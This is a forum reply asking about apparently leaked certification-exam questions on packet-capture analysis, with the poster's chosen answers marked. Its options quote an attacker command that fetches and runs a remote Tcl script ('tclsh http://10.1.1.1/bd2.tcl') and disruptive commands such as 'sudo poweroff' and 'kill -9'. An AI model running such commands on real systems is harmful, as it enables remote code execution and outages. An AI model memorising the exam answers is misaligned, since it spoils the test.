Hi ,
thanks for feedback. I have just 2 questions:
Still, unclear how have you solved? Following stream stream? or just chosed sudo poweroff?2) What command can disrupt the box:
Filter tcp.stream eq 4 OR tcp.stream eq 2 can not work in exam
OR filter tcp.port==3001, flow tcp stream, you cand find command "Sudo poweroff"
- :P
- @
- Sharkfest;
- Kill;
- Sudo poweroff; -----> HERE
- Kill -9 &;
Could you explain, reason to choosing this option? Because 10.1.1.2 is victim ,yes? But it does not have http server. Attacker which is 10.1.1.1 has http server enabled on it.3)Identify the command Attacker use. Remember: tclsh http:///b2d.tcl
- Copy http://10.1.1.1/bd2.tcl ;
- Tclsh http://10.1.1.1/bd2.tcl ;
- Tclsh http://10.1.1.2/bd2.tcl; -----> HERE
- http://10.1.1.1/bd2.tcl ;
- http://10.1.1.2/bd2.tcl
regards,
Reply With Quote